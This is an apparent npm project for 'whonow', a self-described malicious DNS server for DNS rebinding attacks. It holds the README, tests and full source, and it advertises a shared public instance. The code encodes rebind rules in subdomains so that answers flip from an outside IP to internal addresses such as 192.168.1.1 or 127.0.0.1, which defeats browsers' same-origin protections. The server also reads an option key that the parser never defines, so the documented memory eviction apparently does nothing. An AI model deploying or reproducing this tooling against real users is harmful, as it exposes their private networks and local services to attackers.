README.md
# Whonow DNS Server

A malicious DNS server for executing [DNS Rebinding attacks](https://en.wikipedia.org/wiki/DNS_rebinding) on the fly. `whonow` lets you specify DNS responses and rebind rules dynamically *using domain requests themselves*.

```bash
# respond to DNS queries for this domain with 34.192.228.43 the first time
# it is requested and then 192.168.1.1 every time after that
A.34.192.228.43.1time.192.168.1.1.forever.rebind.network

# respond first with 34.192.228.43, then 192.168.1.1 the next five times,
# and then start all over again (1, then 5, forever...)
A.34.192.228.43.1time.192.168.1.1.5times.repeat.rebind.network
```

What's great about dynamic DNS Rebinding rules is that you don't have to spin up your own malicious DNS server to start exploiting the browser's [Same-origin policy](https://en.wikipedia.org/wiki/Same-origin_policy). Instead, everyone can share the same public `whonow` server running on port 53 of `rebind.network`.

**Note**: You should include UUIDs (e.g. `a06a5856-1fff-4415-9aa2-823230b05826
`) as a subdomain in each DNS lookup to a `whonow` server. These have been omitted from examples in this README for brevity, but assume requests to `*.rebind.network` should be `*.a06a5856-1fff-4415-9aa2-823230b05826.rebind.network`. See the [Gotchas](#gotchas) section for more info as to why.

**DISCLAIMER: This software is for educational purposes only. This software should not be used for illegal activity. The author is not responsible for its use. Don't be a dick.**

## Subdomains = Rebind Rules

The beauty of `whonow` is that you can define the behavior of DNS responses via subdomains in the domain name itself. Using only a few simple keywords: `A`, `(n)times`, `forever`, and `repeat`, you can define complex and powerful DNS behavior.

### Anatomy of a `whonow` request

```
A.<ip-address>.<rule>[.<ip-address>.<rule>[.<ip-address>.<rule>]][.uuid/random-string].example.com
```

- `A`: The type of DNS request. Currently only `A` records are supported, but `AAAA` should be coming soon.
- `<ip-address>`: an ipv4 (ipv6 coming soon) address with each octet seprated by a period (e.g. `192.168.1.1`.
- `<rule>`: One of three rules
	- `(n)time[s]`: The number of times the DNS server should reply with the previous IP address. Accepts both plural and singular strings (e.g. `1time, 3times, 5000times`)
	- `forever`: Respond with the previous IP address forever.
	- `repeat`: Repeat the entire set of rules starting from the beginning.
- `[uuid/random-string]`: A random string to keep DNS Rebind attacks against the same IP addresses separate from each other. See [Gotchas](#gotchas) for more info.
- `example.com`: A domain name you have pointing to a `whonow` nameserver, like the publicly available `rebind.network:53` `whonow` instance.

Rules can be chained together to form complex response behavior.

### Examples

```
# always respond with 192.168.1.1. This isn't really DNS rebinding
# but it still works
A.192.168.1.1.forever.rebind.network

# alternate between localhost and 10.0.0.1 forever
A.127.0.0.1.1time.10.0.0.1.1time.repeat.rebind.network

# first respond with 192.168.1.1 then 192.168.1.2. Now respond 192.168.1.3 forever.
A.192.168.1.1.1time.192.168.1.2.2times.192.168.1.3.forever.rebind.network

# respond with 34.192.228.43 the first time, then whatever `whonow --default-address`
# is set to forever after that (default: 127.0.0.1)
A.34.192.228.43.1time.rebind.network
```

### Limitations

> Each label [subdomain] may contain zero to 63 characters... The full domain name may not exceed the length of 253 characters in its textual representation. (from the [DNS Wikipedia page](https://en.wikipedia.org/wiki/Domain_Name_System))

Additionally, there may not be more than 127 labels/subdomains.

## Gotchas

### Use Unique Domain Names

Each unique domain name request to `whonow` creates a small state-saving program in the server's RAM. The next time that domain name is requested the program counter increments and the state may be mutated. **All unique domain names are their own unique program instances**. To avoid clashing with other users or having your domain name program's state inadvertently incremented you should add a UUID subdomain after your rule definitions. That UUID should never be reused.

```
# this
A.127.0.0.1.1time.10.0.0.1.1time.repeat.8f058b82-4c39-4dfe-91f7-9b07bcd7fbd4.rebind.network

# not this
A.127.0.0.1.1time.10.0.0.1.1time.repeat.rebind.network
```

### `--max-ram-domains`

The program state associated with each unique domain name is stored by `whonow` in RAM. To avoid running out of RAM an upper-bound is placed on the number of unique domains who's program state can be managed at the same time. By default, this value is set to 10,000,000, but can be configured with the `--max-ram-domains`. Once this limit is reached, domain names and their saved program state will be removed in the order they were added (FIFO).

## Running your own `whonow` server

To run your own `whonow` server in the cloud use your domain name provider's admin panel to configure a custom nameserver pointing to your VPS. Then install `whonow` on that VPS and make sure it's running on port 53 (the default DNS port) and that port 53 is accessible to the Internet.

```bash
# install
npm install --cli -g whonow@latest

# run it!
whonow --port 53

# you can also run it with more logging to stdout and save DNS activity to CSV
whonow --port 53 --logfile log.csv --verbose
```

![whonow screenshot](.images/screenshot.png)

If that ☝ is too much trouble, feel free to just use the public `whonow` server running on port 53 of `rebind.network`.🌐.

## Usage

```
$ whonow --help
usage: whonow [-h] [-v] [-p PORT] [-d DEFAULT_ANSWER] [-b MAX_RAM_DOMAINS]
              [-l LOGFILE] [-m]
              

A malicious DNS server for executing DNS Rebinding attacks on the fly.

Optional arguments:
  -h, --help            Show this help message and exit.
  -v, --version         Show program's version number and exit.
  -p PORT, --port PORT  What port to run the DNS server on (default: 53).
  -d DEFAULT_ANSWER, --default-answer DEFAULT_ANSWER
                        The default IP address to respond with if no rule is 
                        found (default: "127.0.0.1").
  -b MAX_RAM_DOMAINS, --max-ram-domains MAX_RAM_DOMAINS
                        The number of domain name records to store in RAM at 
                        once. Once the number of unique domain names queried 
                        surpasses this number domains will be removed from 
                        memory in the order they were requested. Domains that 
                        have been removed in this way will have their program 
                        state reset the next time they are queried (default: 
                        10000000).
  -l LOGFILE, --logfile LOGFILE
                        Log to CSV file (default: false)
  -m, --verbose         Log request timestamp and sender IP address to stdout 
                        (default: false)
```

## Testing

A `whonow` server must be running on `localhost:15353` to perform the tests in `test.js`

```bash
# in one terminal
whonow -p 15353
```

```bash
# in another terminal
cd path/to/node_modules/whonow
npm test
```


CHANGELOG.md
# Whonow Changelog

# v1.2.0

- Add CSV logging with `--logfile`. 
- More logging to stdout with `--verbose`.

# v1.1.2

- Unique domain names and their program state are now case-insensitive.

# v1.1.1

- Fix bug that was causing all domain queries to affect the program state of A rebind rules, not just A requests themselves.
- Add a few tests
- Fix Github urls in `package.json`

# v1.1.0

- Package can now be installed globally with `npm install --cli -g whonow@latest`

# v1.0.1

- Package can now be installed globally with `npm install -g whonow`

# v1.0.0

- Initial release


test.js
const dns = require('dns')
const assert = require('assert')
const uuidv4 = require('uuid/v4')

const uuid = uuidv4()

const requests = [
	// domain name, expected result
	[`rebind.network`, '127.0.0.1'],
	[`A.192.168.1.1.${uuid}.rebind.network`, '127.0.0.1'],

	[`A.192.168.1.1.1time.${uuid}.rebind.network`, '192.168.1.1'],
	[`A.192.168.1.1.1time.${uuid}.rebind.network`, '127.0.0.1'],

	[`A.192.168.1.1.forever.${uuid}.rebind.network`, '192.168.1.1'],
	[`A.192.168.1.1.forever.${uuid}.rebind.network`, '192.168.1.1'],

	[`A.192.168.1.1.5times.10.0.0.1.1time.${uuid}.rebind.network`, '192.168.1.1'],
	[`A.192.168.1.1.5times.10.0.0.1.1time.${uuid}.rebind.network`, '192.168.1.1'],
	[`A.192.168.1.1.5times.10.0.0.1.1time.${uuid}.rebind.network`, '192.168.1.1'],
	[`A.192.168.1.1.5times.10.0.0.1.1time.${uuid}.rebind.network`, '192.168.1.1'],
	[`A.192.168.1.1.5times.10.0.0.1.1time.${uuid}.rebind.network`, '192.168.1.1'],
	[`A.192.168.1.1.5times.10.0.0.1.1time.${uuid}.rebind.network`, '10.0.0.1'],
	[`A.192.168.1.1.5times.10.0.0.1.1time.${uuid}.rebind.network`, '127.0.0.1'],

	[`A.192.168.1.1.1time.192.168.1.2.1times.repeat.${uuid}.rebind.network`, '192.168.1.1'],
	[`A.192.168.1.1.1time.192.168.1.2.1times.repeat.${uuid}.rebind.network`, '192.168.1.2'],
	[`A.192.168.1.1.1time.192.168.1.2.1times.repeat.${uuid}.rebind.network`, '192.168.1.1'],
	[`A.192.168.1.1.1time.192.168.1.2.1times.repeat.${uuid}.rebind.network`, '192.168.1.2'],

	[`A.192.168.1.1.1time.192.168.1.2.2times.192.168.1.3.forever.${uuid}.rebind.network`, '192.168.1.1'],
	[`A.192.168.1.1.1time.192.168.1.2.2times.192.168.1.3.forever.${uuid}.rebind.network`, '192.168.1.2'],
	[`A.192.168.1.1.1time.192.168.1.2.2times.192.168.1.3.forever.${uuid}.rebind.network`, '192.168.1.2'],
	[`A.192.168.1.1.1time.192.168.1.2.2times.192.168.1.3.forever.${uuid}.rebind.network`, '192.168.1.3'],
	[`A.192.168.1.1.1time.192.168.1.2.2times.192.168.1.3.forever.${uuid}.rebind.network`, '192.168.1.3'],
	[`A.192.168.1.1.1time.192.168.1.2.2times.192.168.1.3.forever.${uuid}.rebind.network`, '192.168.1.3'],
	[`A.192.168.1.1.1time.192.168.1.2.2times.192.168.1.3.forever.${uuid}.rebind.network`, '192.168.1.3'],
	[`A.192.168.1.1.1time.192.168.1.2.2times.192.168.1.3.forever.${uuid}.rebind.network`, '192.168.1.3'],

	[`a.127.0.0.1.1time.192.168.1.0.forever.${uuid}.rebind.network`, `127.0.0.1`],
	[`a.127.0.0.1.1time.192.168.1.1.forever.${uuid}.rebind.network`, `127.0.0.1`],
	[`a.127.0.0.1.1time.192.168.1.2.forever.${uuid}.rebind.network`, `127.0.0.1`],
	[`a.127.0.0.1.1time.192.168.1.3.forever.${uuid}.rebind.network`, `127.0.0.1`],
	[`a.127.0.0.1.1time.192.168.1.4.forever.${uuid}.rebind.network`, `127.0.0.1`],
	[`a.127.0.0.1.1time.192.168.1.5.forever.${uuid}.rebind.network`, `127.0.0.1`],
	[`a.127.0.0.1.1time.192.168.1.6.forever.${uuid}.rebind.network`, `127.0.0.1`],
	[`a.127.0.0.1.1time.192.168.1.7.forever.${uuid}.rebind.network`, `127.0.0.1`],
	[`a.127.0.0.1.1time.192.168.1.8.forever.${uuid}.rebind.network`, `127.0.0.1`],
	[`a.127.0.0.1.1time.192.168.1.9.forever.${uuid}.rebind.network`, `127.0.0.1`],
	[`a.127.0.0.1.1time.192.168.1.10.forever.${uuid}.rebind.network`, `127.0.0.1`],
	[`a.127.0.0.1.1time.192.168.1.11.forever.${uuid}.rebind.network`, `127.0.0.1`],
	[`a.127.0.0.1.1time.192.168.1.12.forever.${uuid}.rebind.network`, `127.0.0.1`],
	[`a.127.0.0.1.1time.192.168.1.13.forever.${uuid}.rebind.network`, `127.0.0.1`],
	[`a.127.0.0.1.1time.192.168.1.14.forever.${uuid}.rebind.network`, `127.0.0.1`],
	[`a.127.0.0.1.1time.192.168.1.15.forever.${uuid}.rebind.network`, `127.0.0.1`],
	[`a.127.0.0.1.1time.192.168.1.16.forever.${uuid}.rebind.network`, `127.0.0.1`],
	[`a.127.0.0.1.1time.192.168.1.17.forever.${uuid}.rebind.network`, `127.0.0.1`],
	[`a.127.0.0.1.1time.192.168.1.18.forever.${uuid}.rebind.network`, `127.0.0.1`],
	[`a.127.0.0.1.1time.192.168.1.19.forever.${uuid}.rebind.network`, `127.0.0.1`],
	[`a.127.0.0.1.1time.192.168.1.20.forever.${uuid}.rebind.network`, `127.0.0.1`],
	[`a.127.0.0.1.1time.192.168.1.21.forever.${uuid}.rebind.network`, `127.0.0.1`],
	[`a.127.0.0.1.1time.192.168.1.22.forever.${uuid}.rebind.network`, `127.0.0.1`],
	[`a.127.0.0.1.1time.192.168.1.23.forever.${uuid}.rebind.network`, `127.0.0.1`],
	[`a.127.0.0.1.1time.192.168.1.24.forever.${uuid}.rebind.network`, `127.0.0.1`],
	[`a.127.0.0.1.1time.192.168.1.25.forever.${uuid}.rebind.network`, `127.0.0.1`],
	[`a.127.0.0.1.1time.192.168.1.26.forever.${uuid}.rebind.network`, `127.0.0.1`],
	[`a.127.0.0.1.1time.192.168.1.27.forever.${uuid}.rebind.network`, `127.0.0.1`],
	[`a.127.0.0.1.1time.192.168.1.28.forever.${uuid}.rebind.network`, `127.0.0.1`],
	[`a.127.0.0.1.1time.192.168.1.29.forever.${uuid}.rebind.network`, `127.0.0.1`],
	[`a.127.0.0.1.1time.192.168.1.30.forever.${uuid}.rebind.network`, `127.0.0.1`],
	[`a.127.0.0.1.1time.192.168.1.31.forever.${uuid}.rebind.network`, `127.0.0.1`],
	[`a.127.0.0.1.1time.192.168.1.32.forever.${uuid}.rebind.network`, `127.0.0.1`],
	[`a.127.0.0.1.1time.192.168.1.33.forever.${uuid}.rebind.network`, `127.0.0.1`],
	[`a.127.0.0.1.1time.192.168.1.34.forever.${uuid}.rebind.network`, `127.0.0.1`],
	[`a.127.0.0.1.1time.192.168.1.35.forever.${uuid}.rebind.network`, `127.0.0.1`],
	[`a.127.0.0.1.1time.192.168.1.36.forever.${uuid}.rebind.network`, `127.0.0.1`],
	[`a.127.0.0.1.1time.192.168.1.37.forever.${uuid}.rebind.network`, `127.0.0.1`],
	[`a.127.0.0.1.1time.192.168.1.38.forever.${uuid}.rebind.network`, `127.0.0.1`],
	[`a.127.0.0.1.1time.192.168.1.39.forever.${uuid}.rebind.network`, `127.0.0.1`],
	[`a.127.0.0.1.1time.192.168.1.40.forever.${uuid}.rebind.network`, `127.0.0.1`],
	[`a.127.0.0.1.1time.192.168.1.41.forever.${uuid}.rebind.network`, `127.0.0.1`],
	[`a.127.0.0.1.1time.192.168.1.42.forever.${uuid}.rebind.network`, `127.0.0.1`],
	[`a.127.0.0.1.1time.192.168.1.43.forever.${uuid}.rebind.network`, `127.0.0.1`],
	[`a.127.0.0.1.1time.192.168.1.44.forever.${uuid}.rebind.network`, `127.0.0.1`],
	[`a.127.0.0.1.1time.192.168.1.45.forever.${uuid}.rebind.network`, `127.0.0.1`],
	[`a.127.0.0.1.1time.192.168.1.46.forever.${uuid}.rebind.network`, `127.0.0.1`],
	[`a.127.0.0.1.1time.192.168.1.47.forever.${uuid}.rebind.network`, `127.0.0.1`],
	[`a.127.0.0.1.1time.192.168.1.48.forever.${uuid}.rebind.network`, `127.0.0.1`],
	[`a.127.0.0.1.1time.192.168.1.49.forever.${uuid}.rebind.network`, `127.0.0.1`],
	[`a.127.0.0.1.1time.192.168.1.50.forever.${uuid}.rebind.network`, `127.0.0.1`]

]

dns.setServers(['127.0.0.1:15353'])

resolveRequests(requests)

function resolveRequests(requests, index=0) {
	if (index < requests.length) {
		dns.resolve(requests[index][0], 'A', (err, result) => {
			if (err) throw err
			console.log(`${result.toString().padEnd(15)} ${requests[index][0]}`)
			assert.equal(result, requests[index][1])
			resolveRequests(requests, index + 1)
		})
	}
}


src/Client.js
const ipRegex = /^(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)$/


class Client {

    // ntimes
    // forever
    // repeat
    constructor(domain) {
        this.domain = domain
        this.program = this.parseProgram(this.domain)
        this.programCounter = 0
        this.valid = this.program.length > 0
        this.type = null // 'A' or 'CNAME'
    }

    // run the program and return an IP address, or null
    next() {

        if (this.programCounter == this.program.length) return null
        
        const instruction = this.program[this.programCounter]

        if (instruction.name == 'repeat') { // repeat
            this.programCounter = 0
            this.program = this.parseProgram(this.domain)
            return this.next()
        } else { // times and forever
            instruction.count--
            if (instruction.count == 0) {
                this.programCounter++
            }
        }

        return instruction.ip
    }

    parseProgram(domain) {

        const labels = domain.toLowerCase().split('.')

        const instructions = []

        if (labels.length < 1) return []

        // if this isn't an A or CNAME request
        if (!['A', 'CNAME'].includes(labels[0].toUpperCase())) {
            return []
        }

        // loop through the labels and create instructions
        for (let i = 1; i < labels.length; i++) {
            
            // see if the next four labels make and ip address
            const ip = [labels[i], labels[i+1], labels[i+2], labels[i+3]].join('.')

            if (ipRegex.test(ip)) {
                
                const rule = labels[i + 4]

                if (/^\d+time[s]*$/.test(rule)) {
                    
                    instructions.push({ 
                        name: 'times', 
                        ip, 
                        count: parseInt(rule.match(/^\d+/)[0])
                    })

                } else if (rule == 'forever') {

                    instructions.push({ 
                        name: 'forever', 
                        ip, 
                        count: Infinity
                    })

                } else if (rule == 'repeat') {

                     instructions.push({ name: 'repeat' })   
                }

                i += 4

            } else {
                if (labels[i] == 'repeat') {
                    instructions.push({ name: 'repeat' })
                }
            }
        }
        return instructions
    }
}

module.exports = Client

src/DomainRebind.js
const ipRegex = /^(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)$/

class DomainRebind {

    constructor(domain) {
        this.domain = domain
        this.program = this.parseProgram(this.domain)
        this.programCounter = 0
        this.valid = this.program.length > 0
        this.type = null // 'A' or 'CNAME'
    }

    // run the program and return an IP address, or null
    next() {

        if (this.programCounter == this.program.length) return null
        
        const instruction = this.program[this.programCounter]

        if (instruction.name == 'repeat') { // repeat
            this.programCounter = 0
            this.program = this.parseProgram(this.domain)
            return this.next()
        } else { // times and forever
            instruction.count--
            if (instruction.count == 0) {
                this.programCounter++
            }
        }

        return instruction.ip
    }

    // ntimes
    // forever
    // repeat
    parseProgram(domain) {

        const labels = domain.toLowerCase().split('.')
        const instructions = []

        if (labels.length < 1) return []

        // if this isn't an A or CNAME request
        if (!['A', 'CNAME'].includes(labels[0].toUpperCase())) {
            return []
        }

        // loop through the labels and create instructions
        for (let i = 1; i < labels.length; i++) {
            
            // see if the next four labels make and ip address
            const ip = [labels[i], labels[i+1], labels[i+2], labels[i+3]].join('.')

            if (ipRegex.test(ip)) {
                
                const rule = labels[i + 4]

                if (/^\d+time[s]*$/.test(rule)) {
                    
                    instructions.push({ 
                        name: 'times', 
                        ip, 
                        count: parseInt(rule.match(/^\d+/)[0])
                    })

                } else if (rule == 'forever') {

                    instructions.push({ 
                        name: 'forever', 
                        ip, 
                        count: Infinity
                    })

                } else if (rule == 'repeat') {

                     instructions.push({ name: 'repeat' })   
                }

                i += 4

            } else {
                if (labels[i] == 'repeat') {
                    instructions.push({ name: 'repeat' })
                }
            }
        }
        return instructions
    }
}

module.exports = DomainRebind

index.js
#! /usr/bin/env node

const fs     = require('fs')
const path   = require('path')
const dns    = require('native-dns')
const log    = require('loglevel')
const c      = require('chalk')
const { ArgumentParser } = require('argparse')

const DomainRebind = require('./src/DomainRebind.js')
const server = dns.createServer()

function main() {

    const args = parseArgs()
    log.setDefaultLevel('info')

    if (args.logfile) {
        try {
            fs.writeFileSync(args.logfile, 'timestamp,src_ip,question_type,question,answer\n')
            log.info(c.gray('[*]') + ` logging CSV data to ${args.logfile}`)
        } catch (err) {
            log.error(c.red('[!]') + ` error writing to --logfile ${args.logfile}:`)
            log.error(err)
            log.error(c.red('[!]') + ' exiting.')
            process.exit(1)
        }
    }

    const domains = {}
    const orderedDomains = new Set()

    server.on('request', (request, response) => {

        request.question.forEach(question => {

            // only handle A queries for now
            if (question.type == dns.consts.NAME_TO_QTYPE.A) {

                const domain = question.name.toLowerCase()

                if (!domains.hasOwnProperty(domain)) {
                    domains[domain] = new DomainRebind(domain)
                    orderedDomains.add(domain)
                    if (orderedDomains.size > args['max_client_records']) {
                        // remove the oldest client from the set and dict
                        const oldest = orderedDomains.values().next().value
                        orderedDomains.delete(oldest)
                        delete domains[oldest]
                    }
                }

                const address = domains[domain].next()

                let answer = {
                    name: question.name, // respond with original name
                    address: address || args['default_answer'],
                    ttl: 1
                }

                response.answer.push(dns.A(answer))
            }
        })

        if (response.answer.length > 0) {
            response.answer.forEach(ans => {

                const src = `${request.address.address}:${request.address.port}`

                if (args.logfile) {

                    // 'timestamp,src_ip,question_type,question,answer'
                    let line = Date.now() + ','
                    line += src + ','
                    line += 'A,'
                    line += ans.name + ','
                    line += ans.address + '\n'

                    // WARNING: because these calls are async, requests may be
                    // logged out of order. This shouldn't be a problem though
                    // as the csv can be sorted by timestamp
                    fs.appendFile(args.logfile, line, (err) => {
                        if (err) {
                            log.error(c.red('[!]') + ` error writing to ${args.logfile}`)
                            log.error(err)
                        }
                    })
                }

                if (args.verbose) {
                    // time in ISO date format string
                    // https://docs.microsoft.com/en-us/scripting/javascript/date-and-time-strings-javascript#iso-date-format
                    const time = c.yellow(new Date().toISOString())
                    const answer = c.cyan(ans.address.padEnd(15))
                    const address = c.magenta(src.padEnd(21))
                    log.info(c.blue('[+]') + ` ${time} ${address} A ${answer} ${ans.name}`)
                } else {
                    log.info(c.blue('[+]') + ` A ${c.cyan(ans.address.padEnd(15))} ${ans.name}`)
                }
            })
        } else {
            // silently responding to non-A requests with an empty response packet
            // could print here for debugging
        }

        response.send()
    })

    server.on('listening', () => {
        log.info(c.gray('[*]') + ` server listening on port ${args.port}`)
    })

    server.on('error', (err, buff, req, res) => {
        log.error(c.red('[!]') + ' native-dns server error:')
        log.error(err.stack)
    })

    server.on('socketError', (err, socket) => {
        if (err.code == 'EACCES') {
            let m = c.red('[!]')
            m += ` Fatal error binding to port ${args.port}, address in use.`
            log.error(m)
        }
    })

    server.serve(args.port)
}

function parseArgs() {

    const package = JSON.parse(fs.readFileSync(path.join(__dirname, 'package.json')))
    const parser = new ArgumentParser({
      prog: package.name,
      version: package.version,
      description: package.description
    })

    parser.addArgument(
      [ '-p', '--port' ],
      {
        help: 'What port to run the DNS server on (default: 53).',
        defaultValue: 53
      }
    )

    parser.addArgument(
      [ '-d', '--default-answer' ],
      {
        help: 'The default IP address to respond with if no rule is found (default: "127.0.0.1").',
        defaultValue: '127.0.0.1'
      }
    )

    let message =  'The number of domain name records to store in RAM at once. '
        message += 'Once the number of unique domain names queried surpasses this number '
        message += 'domains will be removed from memory in the order they were '
        message += 'requested. Domains that have been removed in this way will '
        message += 'have their program state reset the next time they are queried '
        message += '(default: 10000000).'
    parser.addArgument(
      [ '-b', '--max-ram-domains' ],
      {
        help: message,
        defaultValue: 10000000
      }
    )

    parser.addArgument(
        [ '-l', '--logfile' ],
        {
            help: 'Log to CSV file (default: false)'
        }
    )

    parser.addArgument(
        [ '-m', '--verbose' ],
        {
            help: 'Log request timestamp and sender IP address to stdout (default: false)',
            action: 'storeTrue'
        }
    )
    return parser.parseArgs()
}

main()
